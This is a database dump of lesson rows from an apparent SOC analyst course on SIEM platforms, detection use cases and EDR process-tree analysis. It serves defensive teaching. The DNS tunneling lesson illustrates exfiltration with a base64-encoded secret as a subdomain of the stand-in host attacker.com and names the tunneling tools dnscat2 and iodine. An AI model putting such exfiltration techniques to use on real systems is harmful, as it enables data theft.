(573, 225, '## Market Leaders: Splunk vs. Microsoft Sentinel\n\nIn the SIEM world, there are many players, but two dominate the enterprise space in 2024: **Splunk** and **Microsoft Sentinel**. As an analyst, you will likely work with one of these.\n\n### Splunk: The Heavyweight Champion\n\n**Splunk** is the \"Google for Data\". It started as a log search tool and evolved into a massive Security analytics platform.\n\n#### Key Features\n*   **SPL (Splunk Processing Language)**: A powerful, pipe-based query language (similar to Unix piping).\n    *   `index=firewall src_ip=10.0.0.1 | stats count by dest_port | sort - count`\n    *   Mastering SPL is a resume superpower.\n*   **Schema on Read**: Splunk doesn\'t need to understand the data structure *when it indexes it*. You can define fields later during the search. This is incredibly flexible.\n*   **Ecosystem**: Thousands of \"Apps\" and \"Add-ons\" for every vendor imaginable.\n\n#### Pros & Cons\n*   [+] **Mature**: Extensive documentation, community, and feature set.\n*   [+] **Flexible**: Can handle any type of data, not just security (DevOps, Business Analytics).\n*   [-] **Cost**: Historically very expensive (often charged by GB ingested).\n*   [-] **Complexity**: Requires dedicated engineers to manage the infrastructure (Indexers, Search Heads, Forwarders).\n\n### Microsoft Sentinel: The Cloud Native Challenger\n\n**Microsoft Sentinel** (formerly Azure Sentinel) is a cloud-native SIEM + SOAR solution built directly into Azure.\n\n#### Key Features\n*   **KQL (Kusto Query Language)**: The query language used by Sentinel. It is extremely fast, especially on large datasets.\n    *   `FirewallLogs | where SourceIP == \"10.0.0.1\" | summarize count() by DestinationPort | order by count_ desc`\n*   **Cloud Native**: No servers to manage. You don\'t patch Sentinel; you just enable it. It scales elastically.\n*   **Microsoft Integration**: Ingesting logs from Office 365, Azure AD (Entra ID), and Defender for Endpoint is often \"one-click\" and sometimes free.\n\n#### Pros & Cons\n*   [+] **Ease of Use**: Setup takes minutes, not months.\n*   [+] **Integration**: Unbeatable if your company is a \"Microsoft Shop\" (uses O365, Azure, Windows).\n*   [+] **Cost Model**: Pay-as-you-go.\n*   [-] **Cloud Locked**: While it *can* ingest AWS/Google logs, it works best in Azure.\n*   [-] **Younger**: Less community content and mature 3rd-party integrations compared to Splunk.\n\n### Other Notable Players\n*   **Elastic Security (ELK)**: The open-source giant. Highly customizable, free versions available, favored by engineering-heavy teams.\n*   **QRadar (IBM)**: A legacy enterprise player. Very strong on flow analytics and strict correlation rules.\n*   **Exabeam/Securonix**: Leaders in the UEBA (User Behavior Analytics) space, often used alongside other log managers.\n\n### Which one should you learn?\n*   Learn the **concepts** (Aggregation, Normalization, Correlation), not just the tool. The logic \"Find failed logins\" is the same in SPL and KQL.\n*   However, knowing **SPL** is currently the most requested skill in job descriptions, while **KQL** is the fastest growing.\n\n### Comparison Summary\n| Feature | Splunk | Microsoft Sentinel |\n| :--- | :--- | :--- |\n| **Deployment** | On-Prem, Cloud, or Hybrid | Cloud Only (SaaS) |\n| **Query Language** | SPL | KQL |\n| **Cost Model** | Volume/Workload pricing | Pay-as-you-go (Data/Compute) |\n| **Best For** | Complex, multi-cloud, hybrid enteprises | Azure/Microsoft-centric organizations |', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(574, 226, '## The Open Source Rebel: The ELK Stack (Elastic Stack)\n\nNot every company has the budget for Splunk or Sentinel. Enter the **ELK Stack**, the world\'s most popular open-source log management platform.\n\nELK stands for **E**lasticsearch, **L**ogstash, and **K**ibana. (Though now it includes **B**eats, so sometimes it\'s called the *Elastic Stack*).\n\n### The Components\n\n#### 1. Beats (The Shippers)\nLightweight data shippers that you install on your servers (Agents).\n*   **Filebeat**: Tails log files. Use this for Apache, Nginx, or custom app logs.\n*   **Winlogbeat**: Ships Windows Event Logs.\n*   **Packetbeat**: Sniffs network traffic (like Wireshark) and sends metadata.\n*   **Auditbeat**: Linux audit framework data (File Integrity Monitoring).\n*   *Role*: \"Go get the data and push it.\"\n\n#### 2. Logstash (The Plumber)\nThe heavy-duty processing pipeline. Logstash receives data from Beats (or Syslog), parses it, filters it, and transforms it.\n*   **Input**: Receive data on TCP 5044.\n*   **Filter**: This is where the magic happens.\n    *   *Grok*: A plugin to parse unstructured text into fields using Regex comparisons.\n    *   *GeoIP*: Adds Latitude/Longitude based on IP address.\n    *   *Drop*: Discard noise (e.g., \"Don\'t store debug logs\").\n*   **Output**: Send to Elasticsearch.\n*   *Role*: \"Clean, format, and enrich the data.\"\n\n#### 3. Elasticsearch (The Brain / Database)\nA distributed, RESTful search and analytics engine. It is a NoSQL database that stores data in JSON format.\n*   It is built for **speed**. You can search through billions of documents in milliseconds.\n*   It uses an \"Inverted Index\" (like the index at the back of a textbook). It doesn\'t scan every row; it looks up the word \"Error\" and instantly knows which rows contain it.\n*   *Role*: \"Store the data and find it fast.\"\n\n#### 4. Kibana (The Face)\nThe visualization dashboard.\n*   This is where the Analyst lives. You query Elasticsearch and visualize the results.\n*   Create pie charts, line graphs, maps, and data tables.\n*   **Canvas**: A feature to create pixel-perfect infographic presentations for management.\n\n### Elastic Security\nIn recent years, Elastic has added a dedicated \"Security\" app on top of ELK.\n*   **Detection Engine**: Runs automated rules (like Splunk correlation matches).\n*   **Prebuilt Rules**: Elastic provides hundreds of open detection rules mapped to MITRE ATT&CK.\n*   **Endpoint Security**: Elastic Agent can now prevent malware, not just log it.\n\n### Why use ELK?\n1.  **Cost**: The core is open source (Free). You pay for hardware/cloud hosting, but no licensing fees for data volume.\n2.  **Flexibility**: You have total control over every configuration file. You can build exactly what you need.\n3.  **Community**: Massive community support.\n\n### The Trade-off\nELK is \"Free as in Puppies,\" not \"Free as in Beer.\"\n*   Managing an Elasticsearch cluster is **hard**.\n*   Sharding, replication, heap memory management, and upgrades require specialized DevOps skills.\n*   If your cluster crashes during an attack, you are blind, and there is no 1-800 number to call (unless you pay for Enterprise support).\n\n### Analyst Workflow in Kibana\n1.  **Discover Tab**: Review raw logs. Filter by `event.category: \"authentication\"`.\n2.  **Visualize**: Create a \"Vertical Bar\" chart of `user.name` where `event.outcome: \"failure\"`.\n3.  **Dashboard**: Pin that chart to your \"Morning Coffee\" dashboard to spot anomalies instantly.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(575, 227, '## Wazuh: The Modern Open SIEM\n\nWhile ELK is a general-purpose data platform that *can* be used for security, **Wazuh** is a platform built *specifically* for security from day one. It often sits on top of the ELK stack (using Elasticsearch for storage) but replaces the heavy lifting of Logstash/Beats with its own specialized agents.\n\n### Architecture\n\n#### 1. The Wazuh Agent\nInstalled on endpoints (Windows, Linux, macOS). It is far more powerful than a simple log shipper.\n*   **Log Collection**: Reads system logs and application logs.\n*   **FIM (File Integrity Monitoring)**: It takes cryptographic hashes (MD5/SHA256) of critical files. If a hacker modifies `/etc/passwd` or `system32.dll`, Wazuh alerts immediately.\n*   **Rootkit Detection**: Scans for hidden processes, hidden ports, and anomalous system calls.\n*   **Vulnerability Detection**: Compares installed software versions against the CVE database. \"Hey, you have Chrome version 80 installed; it has 5 critical vulnerabilities.\"\n*   **Active Response**: Can execute scripts to block an attack. (e.g., \"If source IP logs in 10 times fail -> Add IP to Firewall Drop rule\").\n\n#### 2. The Wazuh Server\n*   Receives data from agents.\n*   **Decoders**: Parses raw logs into fields.\n*   **Rules Engine**: The core strength of Wazuh. It has thousands of pre-built rules mapped to PCI-DSS, HIPAA, GDPR, and MITRE ATT&CK.\n    *   *Rule Level*: Alerts are graded 1-15.\n    *   Level 3: \"Login success\" (Informational).\n    *   Level 12: \"Suspicious shell spawned\" (Critical).\n\n#### 3. The Wazuh Dashboard (Indexer)\n*   Historically based on Kibana (OpenSearch Dashboards).\n*   Provides a beautiful UI to visualize FIM changes, compliance scores, and threat alerts.\n\n### Wazuh vs. Traditional SIEM\nWazuh is technically an **XDR (Extended Detection and Response)** solution because it does more than just logs—it monitors the *state* of the endpoint.\n\n*   **Traditional SIEM**: \"I saw a log that says a file changed.\"\n*   **Wazuh**: \"I saw the file change, here is the diff of the content, here is the user who did it, and by the way, that user is running a vulnerable version of Sudo.\"\n\n### Use Case Example: Detecting a Web Shell\n1.  **Attacker**: Uploads `shell.php` to your web server (Apache).\n2.  **Wazuh FIM**: Detects a new file creation in `/var/www/html/`. Checks hash.\n3.  **Wazuh Rule**: \"New file created in web directory with PHP extension\" -> **Alert Level 7**.\n4.  **Attacker**: Accesses the shell. Apache logs 200 OK for `shell.php`.\n5.  **Wazuh Log Analysis**: Sees web request to the newly created file.\n6.  **Active Response**: Triggers a firewall-drop command for the attacker\'s IP.\n\n### Why Analysts Love Wazuh\n*   **Pre-tuned**: It comes out of the box with reasonable defaults. you don\'t have to write a rule to detect \"SSH Brute Force\"—it\'s already there.\n*   **Compliance View**: It has a dedicated view for \"PCI DSS\". You can click it and see exactly which requirements you are failing based on the logs.\n*   **Endpoint Visibility**: It gives you deep insight into the OS, not just the logs the OS decides to print.\n\n### Lab Insight\nIn the upcoming labs, you will likely interface with a SIEM dashboard. Whether it is Splunk, ELK, or Wazuh, remember: **The logic is the same.** You are looking for anomalies, correlating events across time, and validating the generated alerts.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(576, 228, '## Module 22 Review\nYou have completed the SIEM Fundamentals module. You should now understand:\n1.  **Aggregation, Normalization, Correlation**.\n2.  The difference between **Syslog** vs **Agent** ingestion.\n3.  How to read a normalized log vs a raw log.\n4.  The landscape of tools: Splunk, Sentinel, ELK, Wazuh.\n\nProceed to the next module to apply this knowledge in practical Use Cases.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 14:17:57'),
(577, 231, '## Use Case 1: Brute Force Attack (Easy)\n\n**Scenario**: An attacker is trying to guess a user\'s password to gain unauthorized access to the network. This is often the first step in an attack called \"Initial Access.\"\n\n### The Logic\nA brute force attack generates a distinct pattern: **Many Failures followed by (potentially) a Success**.\n\n### 1. The Data Sources\n*   **Source**: Windows Event Logs (Security) or Linux `/var/log/auth.log` or SSH logs.\n*   **Key Fields**:\n    *   `Event ID`: 4625 (Failure), 4624 (Success).\n    *   `Logon Type`: 3 (Network), 10 (RDP).\n    *   `Account Name`: The target user.\n    *   `Source IP`: The attacker\'s IP.\n\n### 2. The Pattern (Signatures)\n*   **Standard Brute Force**:\n    *   One Source IP targeting One User Account.\n    *   High frequency (> 10 failures in 1 minute).\n*   **Password Spraying** (Stealthier):\n    *   One Source IP targeting *Many* different User Accounts.\n    *   Tries \"Password123\" against User A, then User B, then User C.\n    *   Avoids locking out a single account.\n*   **Reverse Brute Force**:\n    *   Many Source IPs (Botnet) targeting One User Account.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event = \"Failed Login\"\n    AND\n    Count > 20\n    AND\n    Time_Window = 5 minutes\n    AND\n    Same Source_IP\n```\n\n### 4. Investigation Steps (The Playbook)\nWhen you see this alert, here is your workflow:\n1.  **Check the Username**: Does the account exist? Or is it `admin`, `root`, `test`? (Non-existent accounts usually imply an automated script).\n2.  **Check the Source IP**: Is it internal or external?\n    *   *Internal*: Could be a misconfigured service or script retry. Contact the machine owner.\n    *   *External*: Check Threat Intelligence (VirusTotal/AbuseIPDB). Is this a known bad IP?\n3.  **Check for Success**: **CRITICAL**. Did they eventually succeed?\n    *   Query: `source_ip=Attacker_IP AND action=Success`.\n    *   If **NO**: The firewall/account lockout did its job. Block the IP.\n    *   If **YES**: **Incident Declared**. The attacker is inside. Reset password immediately, isolate the host, and look for what they did next.\n\n### 5. False Positives\n*   User changed their Active Directory password, but their phone is still trying to sync email with the old password.\n*   A service account (cron job) with hardcoded credentials failing repeatedly.\n\n### 6. Real World Example\n`Oct 21 04:00:01 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:02 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:03 sshd[123]: Failed password for root from 192.168.1.105 port 4422 ssh2`\n`Oct 21 04:00:04 sshd[123]: Accepted password for root from 192.168.1.105 port 4422 ssh2`\n**Verdict**: Successful Brute Force. Priority Critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(578, 232, '## Use Case 2: Malware Beaconing (Easy)\n\n**Scenario**: A user clicks a malicious link. Malware installs on their laptop. The malware needs instructions, so it \"phones home\" to the attacker\'s Command & Control (C2) server. This checking-in process is called **Beaconing**.\n\n### The Logic\nBeaconing is automated. Computers form patterns (heartbeats); humans do not.\n\n### 1. The Data Sources\n*   **Source**: Firewall Logs, Proxy Logs, or DNS Logs.\n*   **Key Fields**:\n    *   `src_ip`: The infected laptop.\n    *   `dest_ip` or `dest_domain`: The C2 server.\n    *   `bytes_sent/received`: Usually small (just asking \"Any commands for me?\").\n    *   `frequency/interval`: The time between connections.\n\n### 2. The Pattern (Signatures)\n*   **Regularity**: Connection to the same IP every 60 seconds (or exactly 5 minutes, etc.).\n*   **Long Duration**: This connection happens 24/7, even when the user is asleep.\n*   **Jitter**: Sophisticated malware adds \"jitter\" (random delay) to hide. E.g., 60s, then 65s, then 58s.\n\n### 3. The SIEM Rule (Pseudocode)\nDetection often requires statistical analysis, not just simple matching.\n```sql\nAlert IF:\n    Same Source_IP connecting to Same Dest_IP\n    Count > 50 times in 24 hours\n    AND\n    Standard_Deviation(Time_Between_Connections) is Low (< 5 seconds)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Analyze the Destination**:\n    *   Is the domain `google.com` (benign) or `x83js92.ru` (suspicious)?\n    *   Is the destination IP hosting a known valid service (Microsoft Update) or a cheap VPS?\n    *   Use **Whois** to check domain age. (Newly registered domains < 30 days old are high risk).\n2.  **Analyze the Payload**:\n    *   Check Proxy logs. User-Agent string?\n    *   Is it `Mozilla` (Browser) or `Python-requests` (Script)?\n3.  **Check Endpoint**:\n    *   Identify the process making the connection.\n    *   Is `chrome.exe` connecting? Or is it `powershell.exe` connecting to the internet? (PowerShell connecting to a Russian IP is almost certainly bad).\n\n### 5. False Positives\n*   Legitimate software updates (Adobe Updater checks in every hour).\n*   NTP (Time sync) traffic.\n*   Telemetry from legitimate apps (Spotify \"I\'m still playing\" signals).\n\n### 6. Mitigation\n*   **Block**: Add the C2 IP/Domain to the Firewall blocklist.\n*   **Isolate**: Take the infected machine off the network.\n*   **Reimage**: Malware often has persistence mechanisms that are hard to remove partially; wiping the machine is safest.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(579, 233, '## Use Case 3: Impossible Travel (Medium)\n\n**Scenario**: A user\'s credentials have been compromised (stolen/phished). The attacker is logging in from their own country, while the legitimate user is logging in from the office.\n\n### The Logic\nA physical person cannot move faster than the speed of an airplane.\n\n### 1. The Data Sources\n*   **Source**: Identity Provider Logs (Azure AD, Okta, PingIdentity) or VPN Logs.\n*   **Key Fields**:\n    *   `User ID`: The account.\n    *   `Source IP`: The login location.\n    *   `GeoIP Data`: The SIEM enriches the IP with City/Country data.\n    *   `Timestamp`.\n\n### 2. The Pattern\n*   Login 1: London, UK at 14:00.\n*   Login 2: New York, USA at 14:30.\n*   Distance: 3,450 miles.\n*   Time Delta: 30 minutes.\n*   Required Speed: 6,900 mph. (Supersonic).\n*   **Conclusion**: Two different people are using the same credentials.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Login Success for User U from Location A at Time T1\n    AND\n    Login Success for User U from Location B at Time T2\n    AND\n    (Distance(A, B) / (T2 - T1)) > 600 mph\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the GeoIP**: Geo-location databases are not 100% accurate.\n    *   Is the IP *actually* in Russia, or is it a corporate VPN exit node that just *registers* to a HQ in Russia?\n2.  **Check for VPN Usage**:\n    *   Did the user turn on their corporate VPN? This might make them appear to \"jump\" from home to the datacenter instantly.\n3.  **Contact the User**: \"Hey, are you currently in Lagos, Nigeria?\"\n4.  **Review Activity**:\n    *   What did the \"Remote\" session do? Did they just check email, or did they download the entire \"Payroll\" folder?\n\n### 5. False Positives\n*   **Mobile + WiFi**: A user is on WiFi (IP A), then switches to 5G (IP B). IP B might geolocate to a carrier tower 300 miles away.\n*   **Cloud Proxies**: Zscaler or other cloud security tools can make traffic appear to originate from regional hubs.\n\n### 6. Remediation\n*   **Force Password Reset**: Invalidate the compromised credentials.\n*   **Revoke Sessions**: Kill active tokens so the attacker is kicked out immediately.\n*   **Enable MFA**: If not already on, this stops 99% of credential theft attacks.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(580, 234, '## Use Case 4: Privilege Escalation (Medium)\n\n**Scenario**: An attacker has gained access to a standard user account (\"Bob\"). Now they want to become an Administrator to install rootkits, dump passwords, or delete backups. This technique is **Privilege Escalation**.\n\n### The Logic\nStandard users should not be added to high-privilege groups. Administrative group formatting changes are rare and sensitive.\n\n### 1. The Data Sources\n*   **Source**: Windows Security Event Logs (Active Directory Domain Controller).\n*   **Key Fields**:\n    *   `Event ID`: **4728** (Member added to security-enabled global group), **4732** (Member added to security-enabled local group), **4756** (Member added to security-enabled universal group).\n    *   `Target Account`: The user being promoted (e.g., \"Bob\").\n    *   `Target Group`: The group being modified (e.g., \"Domain Admins\", \"Enterprise Admins\", \"Schema Admins\").\n    *   `Subject Account`: The user *doing* the adding (who made the change?).\n\n### 2. The Pattern\n*   Any addition to highly sensitive groups (Domain Admins) should be flagged.\n*   Frequent failures to add users to groups (Event 4728 failures) might indicate an attacker guessing permissions.\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Event_ID IN (4728, 4732, 4756)\n    AND\n    Target_Group IN (\"Domain Admins\", \"Administrators\", \"Enterprise Admins\")\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Verify the Change Request**: Check the ticketing system (Jira/ServiceNow). Is there an approved ticket to make Bob an Admin?\n2.  **Check the Executor**: Who added Bob?\n    *   Was it a known Admin account?\n    *   Was it a Service Account? (Suspicious).\n    *   Was it Bob adding himself? (High Confidence Compromise).\n3.  **Time Context**:\n    *   Was this done at 3:00 AM on a Saturday? (Suspicious).\n    *   Was it done during business hours? (More likely legitimate).\n\n### 5. False Positives\n*   Legitimate IT operations. New Sysadmin hired, added to groups.\n*   Automated provisioning scripts (e.g., Identity Management systems) rotating memberships.\n\n### 6. Real World Risk\nIf an attacker reaches \"Domain Admin\", it is typically \"Game Over\". They can access every computer in the company, decrypt all passwords, and even create \"Golden Tickets\" to maintain access forever, even if you reset their password. Speed of detection here is critical.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(581, 235, '## Use Case 5: DNS Tunneling (Hard)\n\n**Scenario**: A firewall blocks all traffic (HTTP, SSH, FTP) except for DNS (Port 53). Attackers know DNS must be open for the internet to work. They encode stolen data inside DNS queries to sneak it past the firewall. This is **DNS Tunneling**.\n\n### The Logic\nDNS is meant for address lookups (Phonebook). It is not meant for data transfer. Tunneling creates data that looks essentially different from normal lookups.\n\n### 1. The Data Sources\n*   **Source**: DNS Server Logs, Firewall Logs (Port 53), or Passive DNS sensors (Zeek).\n*   **Key Fields**:\n    *   `Query`: The domain being requested (`xyz.example.com`).\n    *   `Query Type`: A, TXT, CNAME, NULL, MX.\n    *   `Response Size`: Size of the answer.\n\n### 2. The Pattern\n*   **Long Subdomains**:\n    *   Normal: `www.google.com`\n    *   Tunneling: `base64_packet1_part2_secret_data.attacker.com` -> `cGFzc3dvcmQxMjMK.attacker.com`.\n    *   The attacker controls the `attacker.com` authoritative nameserver, which logs the incoming query (and thus receives the stolen data).\n*   **High Volume**:\n    *   A normal user makes ~1000 DNS queries a day.\n    *   Tunneling requires thousands of queries to transfer a small file because each query can only hold a few bytes of data.\n*   **Rare Record Types**:\n    *   Using `TXT` or `NULL` records to pack more data into the response (C2 commands coming back).\n\n### 3. The SIEM Rule (Pseudocode)\n```sql\nAlert IF:\n    Length(DNS_Query) > 180 characters\n    OR\n    Count(DNS_Queries) to Same_Root_Domain > 1000 in 1 hour\n    OR\n    Unusual_Record_Type (TXT, NULL) with High Entropy (Randomness)\n```\n\n### 4. Investigation Steps (The Playbook)\n1.  **Decode the Subdomain**:\n    *   Copy the subdomain string. Try Base64 or Hex decoding it.\n    *   If it decodes to \"Confidential_Q3_Report.pdf\", you have confirmed data exfiltration.\n2.  **Check the Domain Reputation**:\n    *   Is the root domain (`attacker.com`) known?\n    *   Does it resolve to a legitimate site?\n3.  **Identify the Endpoint**:\n    *   Which machine is making the requests? Isolate it.\n    *   Check for tunneling tools like `dnscat2` or `iodine` running in the process list.\n\n### 5. False Positives\n*   **CDN / Anti-Virus Lookups**: McAfee/Sophos use DNS to check file hashes. These queries look like `long_random_hash.sophosxl.net`. This is legitimate.\n*   **Content Delivery Networks (Akamai)**: Often use long, complex subdomains.\n\n### 6. Why it\'s \"Hard\"\nDistinguishing between a legitimate detailed DNS lookup (like an AV signature check) and a malicious tunnel requires entropy analysis (measuring the randomness of the string), which simple rule logic struggles with. It usually requires Machine Learning or statistical baselining.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 15:05:03'),
(582, 236, '## Module 23 Review\nYou have explored 5 critical SIEM Use Cases:\n1.  **Brute Force**: High volume failures.\n2.  **Beaconing**: Periodic C2 heartbeat.\n3.  **Impossible Travel**: Geo-velocity anomalies.\n4.  **Privilege Escalation**: Group changes and sudo abuse.\n5.  **DNS Tunneling**: Exfiltration via Port 53.\n\nThese rules form the baseline of most SOC detection strategies.', 'markdown', 15, '2025-12-26 22:41:26', '2025-12-29 14:17:57'),
(583, 241, '## Endpoint Detection and Response (EDR)\n\n**EDR** is the flight recorder for endpoints (laptops, servers, workstations). While a SIEM looks at the \"network\" and \"logs,\" an EDR looks at **execution** and **behavior**.\n\n### The Old World: Antivirus (EPP)\nTraditional Antivirus (AV), or Endpoint Protection Platforms (EPP), relied on **Signatures**.\n*   **The Method**: Compare a file\'s hash (SHA256) against a database of known bad files.\n*   **The Flaw**: If an attacker changes *one bit* of the file, the hash changes, and the AV misses it.\n*   **The Blind Spot**: AV cannot see \"Fileless Malware\" (e.g., PowerShell running a malicious script in memory). The file `powershell.exe` is legitimate, so AV ignores it.\n\n### The New World: EDR\nEDR assumes that **prevention will fail**. Its goal is **Detection** and **Visibility**.\nEDR records *everything* that happens on the device:\n1.  **Process Creation**: `cmd.exe` opened `powershell.exe`.\n2.  **Network Connections**: `powershell.exe` connected to `1.2.3.4`.\n3.  **File Modification**: `powershell.exe` wrote a file to `Temp`.\n4.  **Registry Changes**: `powershell.exe` added a generic Run key.\n\nBecause it records the *behavior*, it can detect attacks even if the malware file is brand new (Zero-Day).\n\n### Key Functions of EDR\n1.  **Continuous Monitoring**: Records activity 24/7, storing it either locally or in the cloud.\n2.  **Threat Hunting**: Allows analysts to query the database. \"Show me every computer that ran this specific PowerShell command.\"\n3.  **Automated Response**: \"If Ransomware behavior is detected, kill the process and isolate the machine.\"\n4.  **Remote Shell**: Allows analysts to remotely log in to the machine to investigate (like SSH, but through the EDR cloud).\n\n### Why EDR is Critical for SOC 1\nAs a Tier 1 Analyst, you will spend 50% of your time in the EDR console.\n*   The SIEM tells you **\"Something happened.\"**\n*   The EDR tells you **\"EXACTLY what happened.\"**\n*   *Example*: SIEM says \"Virus Detected on Host A\". EDR shows you that the user downloaded `invoice.zip` from Gmail, opened it, which spawned `cmd.exe`, which ran a script.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(584, 242, '## EDR vs. Legacy Antivirus: The Cage Match\n\nIt is important to clearly distinguish between these two technologies, even though marketing often blurs them.\n\n| Feature | Legacy Antivirus (AV) | Endpoint Detection & Response (EDR) |\n| :--- | :--- | :--- |\n| **Detection Basis** | **Signatures** (Matching known Bad) | **Behavior** (Matching suspicious Actions) |\n| **Visibility** | **Black Box**: \"I blocked a virus.\" (End of story) | **Flight Recorder**: \"I saw the user open Chrome, download X, run Y...\" |\n| **Fileless Attacks** | **Blind**: Cannot see in-memory attacks. | **Visible**: Sees memory allocation and script execution. |\n| **Response** | **Delete/Quarantine File** | **Isolate Host, Kill Process, Remote Shell** |\n| **Analyst Role** | Passive (Wait for alerts) | Active (Hunt and Investigate) |\n\n### The \"Next-Gen AV\" (NGAV)\nModern tools often combine both. CrowdStrike, SentinelOne, and Defender for Endpoint are actually **EPP (Prevention) + EDR (Detection)** in a single agent.\n*   They *do* block known malware (EPP).\n*   BUT they also record all activity for investigation (EDR).\n\n### Scenario: The PowerShell Attack\n1.  **Attack**: Hacker sends a Word Doc with a macro. The macro runs: `powershell.exe -enc <malicious_code>`.\n2.  **Legacy AV**: Scans `winword.exe` (Safe). Scans `powershell.exe` (Safe). **Result**: Infection.\n3.  **EDR**:\n    *   Sees `winword.exe` spawn `powershell.exe`. (Suspicious).\n    *   Sees `powershell.exe` make a network connection to a non-Microsoft IP. (Very Suspicious).\n    *   **Alerts**: \"Suspicious Process Chain from Word Document.\"\n    *   **Action**: Kills the PowerShell process tree.\n\n### Why \"Signatures\" are Dead\nAttackers use \"Polymorphism\". They automate their malware compilers to change the code structure every 10 seconds.\n*   To AV, it looks like a new file every time.\n*   To EDR, it looks like a program trying to encrypt the hard drive (Ransomware behavior). The behavior never changes.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(585, 243, '## The Process Tree: The DNA of an Attack\n\nIf you learn only one thing about EDR, let it be the **Process Tree** (or Parent-Child Relationship).\n\n### What is a Process?\nWhen you run a program (like Calculator), the Operating System creates a **Process**. It assigns it a **PID (Process ID)**.\n\n### Parent and Child\nProcesses do not appear out of thin air. They are spawned by other processes.\n*   **Parent**: The creator.\n*   **Child**: The created.\n\n**Normal Example**:\n1.  You double-click Chrome on your desktop.\n    *   Parent: `explorer.exe` (The Windows Desktop)\n    *   Child: `chrome.exe`\n2.  You open a PDF inside Chrome.\n    *   Parent: `chrome.exe`\n    *   Child: `AcrobatReader.exe`\n\n**Malicious Example**:\n1.  User opens an email attachment (`Invoice.docx`).\n    *   Parent: `outlook.exe`\n    *   Child: `winword.exe`\n2.  The document contains a malicious macro.\n    *   Parent: `winword.exe`\n    *   Child: `cmd.exe` (Command Prompt) **<-- RED FLAG**\n3.  The Command Prompt downloads malware.\n    *   Parent: `cmd.exe`\n    *   Child: `powershell.exe`\n\n### Visualizing the Tree\nEDR tools visualize this as a hierarchy DAG (Directed Acyclic Graph).\n```\nexplorer.exe (PID 1000)\n    |\n    |-- outlook.exe (PID 1200)\n         |\n         |-- winword.exe (PID 1300)  <-- \"Invoice.docx\"\n              |\n              |-- cmd.exe (PID 1400) <-- \"Active Malicious Content\"\n                   |\n                   |-- curl.exe (PID 1500)\n```\n\n### The Analyst\'s Job\nYour job is to look at this tree and ask: **\"Does this make sense?\"**\n*   Does Microsoft Word *need* to open the Command Prompt to show you a document? **No.**\n*   Does Adobe Reader *need* to run PowerShell to display a PDF? **No.**\n*   Does Chrome *need* to run the Calculator? **No.**\n\nThese illogical relationships are the **strongest indicators of compromise (IOCs)** in existence. They are harder for attackers to hide than file hashes or IP addresses.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(586, 244, '## Reading Process Ancestry: Who is your Father?\n\nTo catch advanced attackers, you must understand **Ancestry**. It\'s not just about the immediate parent, but the \"Grandparent\" and the whole lineage.\n\n### The \"Grandparent\" Context\nSometimes, the immediate parent looks okay, but the context is wrong.\n**Example**:\n`powershell.exe` running a script.\n*   Make sense? Maybe. Admins use PowerShell all the time.\n*   **Context 1 (Good)**:\n    *   Grandparent: `services.exe` -> Parent: `svchost.exe` -> Child: `powershell.exe` (Running a scheduled maintenance task).\n*   **Context 2 (Bad)**:\n    *   Grandparent: `chrome.exe` -> Parent: `cmd.exe` -> Child: `powershell.exe` (User downloaded a script from the browser and ran it).\n\n### Orphaned Processes\nSometimes, the Parent dies before the Child.\n*   `cmd.exe` spawns `malware.exe`.\n*   `cmd.exe` closes/exits.\n*   `malware.exe` is still running.\nIn Windows, the Parent ID (PPID) technically points to a non-existent process. Modern EDRs track this linkage historically so you can still see who the *original* parent was.\n\n### Spoofing (PPID Spoofing)\nAdvanced attackers can trick Windows. They can tell the OS: \"Launch my malware, but pretend that `explorer.exe` is the parent, not my hacking tool.\"\n*   This is called **Parent PID Spoofing**.\n*   **Detection**: EDRs look for discrepancies between the *recorded* parent and the *start time* of the process. If a Child process claims to be born 5 minutes *before* its Parent started, verified spoofing is likely occurring.\n\n### Standard Ancestry (What is Normal?)\nYou need to know what \"Normal\" looks like to spot the \"Abnormal\".\n*   `svchost.exe`: Generic host for services. Should usually be spawned by `services.exe`.\n*   `lsass.exe`: Local Security Authority. Should be spawned by `wininit.exe`.\n*   `explorer.exe`: The user shell. Spawned by `userinit.exe`.\n\nIf you see `lsass.exe` spawned by `winword.exe`, you are looking at an attack (likely Credential Dumping).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
